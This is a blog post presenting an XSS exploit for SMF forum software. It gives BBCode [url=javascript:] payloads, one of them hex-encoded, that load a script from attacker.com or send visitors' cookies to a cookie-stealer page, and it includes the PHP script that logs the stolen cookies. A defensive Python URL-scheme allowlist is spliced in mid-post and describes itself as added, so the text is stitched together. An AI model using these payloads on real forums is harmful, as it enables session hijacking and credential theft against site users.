XSS BBCode Exploit SMF All Versions

Posted on 12:48 by Xianur0

Author: Xianur0

The SMF BBCode parser does not properly filter user-specified URLs:

Code:
[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]

Clicking the image runs the JavaScript.

BBC Cookie Exploit:

Code:
[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%22%30%25%22%20%68%65%69%67%68%74%3D%22%30%25%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%74%61%63%6B%65%72%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%74%65%61%6C%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%20%2B%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%2B%20%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]

PHP Cookie Stealer:

Code:
<?php
$cookie = $_GET['cookie'];
$handler = fopen('cookies.txt', 'a');
fwrite($handler, $cookie."\n");
?>
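
On the defensive side, both payloads above depend on a `javascript:` scheme surviving inside `[url=...]`. The following is an added example, not code from this post or from SMF: a scheme allowlist check for `[url=]` targets plus an audit of a stored post. The function names, the allowed schemes and the sample post are assumptions made for the illustration.

```python
import html
import re

# Assumption: schemes this forum chooses to permit in [url=...] targets.
ALLOWED_SCHEMES = {"http", "https", "ftp", "mailto"}

URL_TAG = re.compile(r"\[url=([^\]]*)\]", re.IGNORECASE | re.DOTALL)
SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)
C0_AND_SPACE = "".join(map(chr, range(0x21)))


def normalize_target(raw: str) -> str:
    """Approximate what a browser does to a URL before reading its scheme."""
    value = html.unescape(raw)              # &#106;avascript: becomes javascript:
    value = re.sub(r"[\t\r\n]", "", value)  # tab, CR and LF are dropped anywhere
    return value.strip(C0_AND_SPACE)        # as are leading/trailing controls and spaces


def is_safe_target(raw: str) -> bool:
    """True only for an absolute URL whose scheme is on the allowlist.

    Deny by default: empty, relative and scheme-less targets are rejected too.
    """
    match = SCHEME.match(normalize_target(raw))
    return bool(match) and match.group(1).lower() in ALLOWED_SCHEMES


def audit_post(bbcode: str) -> list[str]:
    """Return every [url=...] target in a post that fails the allowlist."""
    return [t for t in URL_TAG.findall(bbcode) if not is_safe_target(t)]


# Constructed sample post (not taken from a real forum).
SAMPLE_POST = (
    "[url=http://example.com/]fine[/url]\n"
    "[url=javascript:alert('xss')]plain[/url]\n"
    "[url=JaVa\nScRiPt:alert(1)]mixed case, embedded newline[/url]\n"
    "[url= &#106;avascript:alert(1)]entity-encoded[/url]\n"
    "[url=]empty[/url]\n"
)

if __name__ == "__main__":
    for target in audit_post(SAMPLE_POST):
        print("unsafe [url=] target:", repr(target))
```

Apply the check when a post is rendered as well as when it is submitted, so posts stored before the filter existed are covered. Marking the session cookie HttpOnly keeps it out of `document.cookie` even if a script does run.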

2 comments:

Anonymous said...

does not work on 1.1.8 - so is not all versions.

Anonymous said...

Garca